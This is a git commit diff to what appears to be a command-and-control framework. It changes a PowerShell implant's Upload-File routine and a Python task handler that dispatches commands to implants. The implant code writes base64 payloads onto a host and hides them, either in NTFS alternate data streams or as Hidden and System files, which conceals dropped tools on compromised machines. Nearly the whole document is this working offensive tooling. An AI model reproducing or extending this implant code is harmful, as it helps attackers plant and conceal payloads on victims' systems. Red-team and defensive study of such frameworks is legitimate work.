Tinker with ADS

2019-03-12 08:57:51 +00:00 · 2019-03-12 08:57:51 +00:00 · eee5a50bbc
parent 6451f19205
commit eee5a50bbc
2 changed files with 15 additions and 24 deletions
--- a/Modules/Stage2-Core.ps1
+++ b/Modules/Stage2-Core.ps1
@ -501,38 +501,31 @@ function Upload-File
    )
    try {
        $Stream = ""
-        
+        $FullPath = $Destination
+        if ($Destination -Match ':[^\\]'){
+            $Destination =  $FullPath.Substring(0, $FullPath.LastIndexOf(":"))
+            $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1)
+        }
+        if($Stream){
+            $NotHidden = $true
+        }
        if ($NotHidden -eq $true) {
-            write-output "Uploaded file to: $Destination"
-            $FullPath = $Destination
-            if ($Destination -Match ':[^\\]'){
-                $Destination =  $FullPath.Substring(0, $FullPath.LastIndexOf(":"))
-                $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1)
-            }
            $fileBytes = [Convert]::FromBase64String($Base64)
            if ($Stream){
-                add-content -path $Destination -value $fileBytes -stream $Stream -encoding byte
+                set-content -path $Destination -value $fileBytes -stream $Stream -encoding byte 
            } else {
                [io.file]::WriteAllBytes($Destination, $fileBytes)
            }
+            write-output "Uploaded file to: $FullPath"
        } else {
-            write-output "Uploaded file as HIDDEN & SYSTEM to: $Destination"
-            write-output "Run Get-ChildItem -Force to view the uploaded files"
-            $FullPath = $Destination
-            if ($Destination -Match ':[^\\]'){
-                $Destination =  $FullPath.Substring(0, $FullPath.LastIndexOf(":"))
-                $Stream = $FullPath.Substring($FullPath.LastIndexOf(":") + 1)
-            }
            $fileBytes = [Convert]::FromBase64String($Base64)
-            if ($Stream){
-                add-content -path $Destination -value $fileBytes -stream $Stream -encoding byte
-            } else {
-                [io.file]::WriteAllBytes($Destination, $fileBytes)
-            }
+            [io.file]::WriteAllBytes($Destination, $fileBytes)
+            write-output "Uploaded file as HIDDEN & SYSTEM to: $FullPath"
            $file = Get-Item $Destination -Force
            $attrib = $file.Attributes
            $attrib = "Hidden,System"
            $file.Attributes = $attrib  
+            write-output "Run Get-ChildItem -Force to view the uploaded files"
        }

    } catch {
--- a/Tasks.py
+++ b/Tasks.py
@ -2,7 +2,7 @@

 from Colours import Colours 
 from Core import load_module, load_module_sharp, encrypt, default_response 
-import DB, datetime, hashlib
+import DB, datetime, hashlib, re

 def newTask(path):
  result = DB.get_implants_all()
@ -27,9 +27,7 @@ def newTask(path):
           user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
          elif (command.lower().startswith('upload-file')):
            filepath = command.replace('upload-file', '')
-            if ":" in filepath:
-              filepath = filepath.split(":")[0].strip()
-            elif ";" in filepath:
+            if ";" in filepath:
              filepath = filepath.split(";")[1].strip()
            elif "estination" in filepath:
              filepath = filepath.split('"')[1].strip()